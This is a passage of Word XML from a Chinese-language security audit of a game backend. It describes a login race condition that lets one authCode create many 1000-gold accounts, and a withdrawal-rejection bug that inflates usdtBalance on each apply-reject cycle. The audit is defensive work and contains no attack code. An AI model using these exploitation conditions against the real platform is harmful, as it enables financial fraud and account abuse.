          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 读到"不存在"，各自执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>createUser(0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并写入独立的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserAccount(goldBalance=1000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1131"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">各响应返回不同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（对应不同 userId），攻击者持有 N 个账户、各拥有 1000 金币</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若系统存在金币兑换 USDT 等变现路径，可将重复注册的金币套现</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：在 Redis 为 null 且数据库无 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>openId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 唯一约束的情况下，N 个并发请求各自返回不同 userId 的登录 Token，每个账户均有 1000 金币初始余额。</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113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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 TokenAuthFilter 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>NO_TOKEN_PATTERNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 白名单中）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1134"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>签名验证：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>需要有效的 AppKey/AppSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（SignAuthTestFilter 覆盖 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；若签名验证被禁用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>properties.isEnabled()==false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）则无任何前置要求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1135"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前置条件：持有合法 CoinW authCode；Redis 不可用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>redisTemplate == null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>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修复建议方向（仅描述缺陷本质，不做改进建议）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>核心问题在于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>consumeAuthCodeOnce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>redisTemplate == null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径选择了静默放行而非 fail-fast</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>authCode 在外部验证（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getUserInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）与本地消费（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>consumeAuthCodeOnce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）之间存在可观察的时间窗口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">并发路径下缺少数据库级别的 openId 唯一性保证（无 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 DB unique constraint 作为兜底）</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139"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserController.java.getCoinwUserInfo → UserService.java.getOrCreateMainUser → UserService.java.createUser → UserService.java.recordLogin</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audit_m241_923_getCoinwUserInfo_ctrl-path1of28.md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：WithdrawManageService.java#applyRejectedImport</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_54" w:id="54"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞53：提现拒绝时余额操作方向逆反——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 无中生有，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 二次冻结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="114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：提现拒绝流程余额操作逆反（usdtBalance 虚增 / usdtUsableBalance 双重扣减）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="114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src/main/java/com/gameBack/mjservice/service/WithdrawManageService.java:applyRejectedImport</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="114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业务逻辑错误</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="114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14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：管理员（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 受 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>.authenticated()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 保护）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="114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applyRejectedImport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法对提现申请执行"拒绝返还"时，余额更新方向与其注释描述的语义完全相反：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 注释："拒绝：usable 减申请额，等额加回 usdtBalance（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与游戏端申请时冻结 usable 对称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按对称关系，游戏端申请时执行的是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance -= X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（冻结），则拒绝返还应执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>逆操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance += X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（解冻），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不变（资金从未真正离账）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>但代码实际执行的是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance += refundAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：凭空向用户总余额注入资金（从未被扣减过，却反向增加）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance -= refundAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：在申请时已冻结（已减一次）的可用余额再次扣减（双重冻结）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>可利用条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：代码存在一个守卫检查 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usable.compareTo(refundAmount) &lt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 会抛出异常。这意味着只要用户在申请提现后 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍 ≥ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>refundAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（即用户申请前可用余额 ≥ 2 倍申请额），该错误操作就能通过守卫正常执行：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初始状态：usdtBalance=1000, usdtUsableBalance=1000</w:t>
              <w:br/>
              <w:t xml:space="preserve">  用户申请提现 100：usdtUsableBalance=900</w:t>
              <w:br/>
              <w:t xml:space="preserve">  管理员执行拒绝（守卫检查：900 &gt;= 100，通过）：</w:t>
              <w:br/>
              <w:t xml:space="preserve">    usdtBalance = 1000 + 100 = 1100  ← 凭空多出 100</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    usdtUsableBalance = 900 - 100 = 800  ← 又少了 100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">每轮循环（申请→拒绝）可使 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 增加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>refundAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，直到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 降至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>refundAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 以下。恶意或被入侵的管理员账户可通过此手段持续虚增用户的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段，造成账务数据严重失真，并可能影响依赖 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段的其他游戏业务逻辑（如展示余额、奖励判定等）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="114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数据流：HTTP POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
